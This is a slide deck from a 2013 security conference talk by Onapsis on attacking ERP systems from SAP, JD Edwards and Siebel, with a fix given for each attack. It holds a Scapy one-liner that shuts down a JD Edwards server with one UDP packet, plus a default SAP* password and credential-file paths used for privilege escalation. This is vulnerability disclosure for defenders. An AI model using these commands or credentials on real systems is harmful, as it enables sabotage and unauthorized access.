Upload
onapsis-inc
View
178
Download
6
Tags:
Embed Size (px)
Citation preview
ERP Security:How hackers can open the safe and take the jewels
September 25-27, 2013
Ekoparty Security Conference
Buenos Aires, Argentina
Ezequiel Gutesman Ezequiel Gutesman (@gutes)(@gutes) [email protected] [email protected]
Jordan Santarsieri Jordan Santarsieri (@jsansec) (@jsansec) [email protected]@onapsis.com
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 2
Disclaimer
This publication is copyright 2013 Onapsis Inc. – All rights reserved.
This publication contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver, Duet,
PartnerEdge, ByDesign, SAP Business ByDesign, and other SAP products and services mentioned herein are
trademarks or registered trademarks of SAP AG in Germany and in several other countries all over the world.
Business Objects and the Business Objects logo, BusinessObjects, Crystal Reports, Crystal Decisions, Web
Intelligence, Xcelsius and other Business Objects products and services mentioned herein are trademarks or
registered trademarks of Business Objects in the United States and/or other countries.
This publication contains references to the products of Oracle and services mentioned herein are trademarks or registered trademarks of Oracle in all countries all over the world.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP
Group shall not be liable for errors or omissions with respect to the materials.
Oracle Corporation is neither the author nor the publisher of this publication and is not responsible for its content, and Oracle Corporation shall not be liable for errors or omissions with respect to the materials.
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 3
Agenda
1.Introduction● Why bothering about ERPs?● History of ERP Security● ERP Security for hackers
2.Targeting ERPs● Reinventing the wheel: Technology stacks● Attack Vectors● Demo time!
● Sabotage● Espionage● Fraud
3.Conclusions
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 5
Why bothering about ERPs?
SALESSALES
PRODUCTIONPRODUCTION
FINANCIAL PLANNINGFINANCIAL PLANNING
INVOICINGINVOICING
PROCUREMENTPROCUREMENT
TREASURYTREASURY
LOGISTICSLOGISTICS
PAYROLLPAYROLL
BILLINGBILLING
HUMAN RESOURCESHUMAN RESOURCES
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 6
Why bothering about ERPs?
Forbes 500
Mid-size companies
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 7
Why bothering about ERPs?
Zombies → Botnets →
Hacktivism(*)
Vulns
(*) http://suelette.home.xs4all.nl/underground/underground.txt
Cyberwarfare&
Surveillance
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 8
Why bothering about ERPs?
• They run business-critical processes
• They Store the most sensitive information
• Organizations are highly-dependent on them
ERP
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 9
History of ERP security
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 10
History of ERP security
1970 1980 1990 2000 2013
1993SAP
R/3Realtime
3-tier
1972 – SAP RF → R/1
1980 SAP R/2 (mainframe)
1988MorrisWorm
2004SAP Netweaver
2003“SAP” Password Sicherheit
2008SAP @JtR
2009 (3) Attacking SAP clients
Decompression of SAP's DIAGprotocol
The risks of downward compatibility
2002SAP “virus”SAPVirWir hacken eine SAPDatenbank
2007
Exploiting SAPInternals
2010 (5+) SAP Knowledge Management
Attacking users with SAPSploit
Rootkits and Trojans on your SAP Landscape The truth about ABAP Security Protecting SAP Applications Against Common Attacks (SAP)
SAP Security Notes
2011 (5+)The Invoker ServletSAP Backdoors & RootiktsArch. & program vulns in SAP'sJ2EE engineSecurity of Enterprise Business Application SystemsAttacks to SAP Web Applications
2012(10+)
30 years of SoD 13 years
1996 Ping of Death
1972BufferOverflows
1995 XSS
2002 SQLiCSRF
2001 HeapSprayingOWASP
2003Metasploit
2006Bluepill
2010Practical Padding Oracles
2011BEAST
2012CRIME
2008Debian PRNG Bug @
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 11
ERP Security for hackers
FRAUD
ESPIONAGESABOTAGE
Extract customer/vendor/HR data, financial planning information, balances, profits, sales information, manufacturing recipes, etc.
Paralyze the operation of the organization by shutting down the ERP system, disrupting interfaces with other systems and deleting critical information, etc.
Modify financial information, tamper sales and purchase orders, create new vendors, modify vendor bank account numbers, etc.
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 13
Reinventing the wheel: Technology stacks
Layered architectureAttack Vectors
Client (web/API/thick client)
Application Server
DB
OS
Proprietary protocols / HTTP / SOAP /
CORBA
Trust relationships / ODBC / Other
External Servers
&Other
Application servers
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 14
Reinventing the wheel: Technology stacks
Layered architectureAttack Vectors - SAP
http://bit.ly/19AXe7Y
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 15
Reinventing the wheel: Technology stacks
Layered architectureAttack Vectors - SAP
http://bit.ly/19AXe7Y
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 16
Reinventing the wheel: Technology stacks
Layered architectureAttack Vectors – Oracle JD Edwards
http://bitly.com/QB12xx
HTTP HTTP HTTPJDENET
ODBC
ODBC
Web Server JDE Java Application
Server (JAS)
JDE Enterprise
Server
DatabaseServer
JDE Deployment
Server
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 17
Attack Vectors• Components and servers through protocols
– P4, DIAG, RFC, NI, CORBA, SOAP, JDENET, HTTP, SNC, etc, etc.
• Crypto
– Stored keys, default certificates, proprietary schemes
• Business through data manipulation
– Default credentials, lack of checks
• Apps
– Web , companion apps. , transactions, reports, external tools, APIs
• DB
– Connectors, trust relationships, default accounts
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 20
JD Edwards: Shutdown via UDP
The JDENet component listens on port 6015 (UDP) for control commands:
SHOWCONN TOGGLE_LOG CONNECT_FROM CONNECT_TO CONNECT_REJECT GET_WRKMGT VIEW_KERNEL_TRACE SHUTDOWN USRBROADCAST …
Wait...
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 21
JD Edwards: Shutdown via UDP
Demo
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 22
JD Edwards: Shutdown via UDP
>>> send((IP(dst="192.168.254.128")/UDP(dport=6015)/"SHUTDOWN"))
0000 45 00 00 24 00 01 00 00 40 11 F9 25 C0 A8 00 46 E..$....@..%...F0010 C0 A8 00 0C 00 35 17 7F 00 10 22 3D 53 48 55 54 .....5...."=SHUT0020 44 4F 57 4E DOWN
An attacker needs:
– Access to port 6015 on target
– Send UDP packet
An Attacker gets:
– Immediate JDE Enterprise Server shutdown
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 23
JD Edwards: Shutdown via UDP
>>> send((IP(dst="192.168.254.128")/UDP(dport=6015)/"SHUTDOWN"))
0000 45 00 00 24 00 01 00 00 40 11 F9 25 C0 A8 00 46 E..$....@..%...F0010 C0 A8 00 0C 00 35 17 7F 00 10 22 3D 53 48 55 54 .....5...."=SHUT0020 44 4F 57 4E DOWN
An attacker needs:
– Access to port 6015 on target
– Send UDP packet
An Attacker gets:
– Immediate JDE Enterprise Server shutdown
Fix:
Apply the latest Oracle Critical Patch Update, as the fix for
this attack was released by oracle in a scheduled CPU.
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 24
Siebel: Bypass log in
The Anonymous user
• Required even if the applications do not allow access by unregistered users
• Used at start up, to connect to“datasource”
• If deleted, no user could access Siebel
• At installation time, Siebel asks you to choose an already created user that will become the Anonymous user
• Should have low privileges, but to avoid configuration issues...
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 25
Siebel: Bypass log in
An attacker needs:
– Access to the application
– Insecure configuration of Anonymous user
An Attacker gets:
– Complete control of the Siebel installation
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 26
Siebel: Bypass log in
Demo
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 27
Siebel: Bypass log in
DemoFix:
In the Siebel configuration file, set the “anonymous user”
property to a low-privileged user.
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 29
SAP* w/Master password on installation
SAP: Diverting payments (default credentials)
SAP Clients (or mandants)– Entity w/ independent data (like a tenant)– 3-digit identifiers– “special” default clients (created on installation)
• 000 → Cross-client tasks• 001 → Template for new clients• 066 → SAP support
http://help.sap.com/saphelp_nw70/helpdata/en/3e/cdaccbedc411d3a6510000e835363f/content.htm
SAP* left w/pass 06071992
Catch: SAP* in client 066 not w/ SAP_ALL privileges, but...
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 30
SAP: Diverting payments (default credentials)
Demo
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 31
SAP: Diverting payments (default credentials)
DemoFix:
- Change SAP* password on all clients (specially 066)
- Correctly assign SAP* permissions
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 33
JD Edwards: Stealing passwords
Again, the JDENet... is also listening on port 6015 (TCP) for JDEMsg commands
Remotely retrieve information from the JDE.INI file, and also sensitive information in clear-text
Kernel types and configuration
Security Server configuration
SSO Node information
Database information
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 34
JD Edwards: Stealing passwords
An Attacker needs:
– Access to port 6015 on target (TCP)
– Send function call (JdeMsg number 563)•Use hard-coded key and provide victim's username
An Attacker gets:
– Victim's password
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 35
JD Edwards: Stealing passwords
DemoFix:
Apply the latest Oracle Critical Patch Update, as the fix for
this attack was released by oracle in a scheduled CPU.
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 36
Siebel: Search Inside
Siebel Query Language (no, it's not SQL)
• Used everywhere in Siebel
• Originally designed to filter data inside Applets
• Executing queries not restricted by authorization checks (privilege independent)
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 37
Siebel: Search Inside
Access control in Siebel
@ View Level
@ Business Component
Level
Who can access the views
Who can access the data
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 38
Siebel Query Language Injection
DemoFix:
Using eScript, catch the pre-query or Invoke query methods
applying a custom filter which should prevent the use of
dangerous functions.
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 39
SAP: Getting DB Admin rights
“The J2EE Engine provides a secure storage area where applications or service components on the J2EE Engine can store sensitive data such as passwords or communication
destinations, in encrypted form” (*)
(*) http://help.sap.com/saphelp_nw73/helpdata/en/47/b08e68542e3378e10000000a421937/content.htm
/usr/sap/<SID>/SYS/global/security/data/SecStore.properties
3DES
Problem #1get the file
Problem #2decrypt file
Problem #3access DB
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 40
SAP: Getting DB Admin rights
1. Getting the Secure Store File
https://service.sap.com/sap/support/notes/1682613
RMI CORBA
P4(RMI)
SAP NetWeaver Application Server
Uses P4 for:
• Communication between objects in different namespaces (e.g. FileTransfer_Stub)
• Reliable client-server connections
• Transparent failover for clustered remote objects
• Etc
/usr/sap/<SID>/SYS/global/security/data/SecStore.properties
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 41
SAP: Getting DB Admin rights
2.Decrypt Secure Store
3.Access DB
3DESKey bundle?
/usr/sap/<SID>/SYS/global/security/data/SecStore.properties
/usr/sap/<SID>/SYS/global/security/data/SecStore.key
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 42
SAP: Getting DB Admin rights
DemoFix:
- Apply note https://service.sap.com/sap/support/notes/1682613
- Correctly handle access to SecStore.key file
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 44
Conclusions● ERP Systems are among the most critical systems in the
organization and that makes them a really interesting target to the attackers
● ERP security has a long history, most of it was about SoD● Technical vulnerabilities are more critical than SoD since
the attacker doesn't need any user in the system ● The attack surface is huge, proprietary protocols and
custom technologies are everywhere● Inherited code from the past● Patching practices are delayed due to complexity and
cost ● Since 2009 ERP cyber-security is getting more attention.
Leading organizations are already leading with this.
Ezequiel Gutesman Ezequiel Gutesman (@gutes)(@gutes) [email protected] [email protected]
Jordan Santarsieri Jordan Santarsieri (@jsansec) (@jsansec) [email protected]@onapsis.com
blog.onapsis.comblog.onapsis.comadventure.onapsis.comadventure.onapsis.com